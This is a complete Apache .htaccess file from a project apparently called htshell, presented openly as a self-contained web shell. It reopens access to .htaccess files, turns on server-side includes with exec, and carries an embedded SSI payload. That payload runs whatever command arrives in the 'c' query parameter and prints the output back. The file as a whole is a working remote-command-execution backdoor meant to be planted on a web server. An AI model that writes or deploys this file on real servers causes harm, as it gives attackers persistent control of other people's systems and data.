# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
    SetOutputFilter INCLUDES
</Files>

# Enable serverside includes with exec functionality
Options +Includes

#Make apache treat .htaccess as a server side include file
#AddHandler text/html .htaccess
#AddOutputFilter INCLUDES .htaccess

#SHELL<!--#exec cmd="echo ''" --><!--#if expr="$QUERY_STRING_UNESCAPED = /^c=(.*)$/" --><!--#set var="cmd" value="$1 2>&1" --><!--#else --><!--#set var="cmd" value="echo 'Regex failed'" --><!--#endif --><!--#exec cmd="$cmd"-->LLEHS
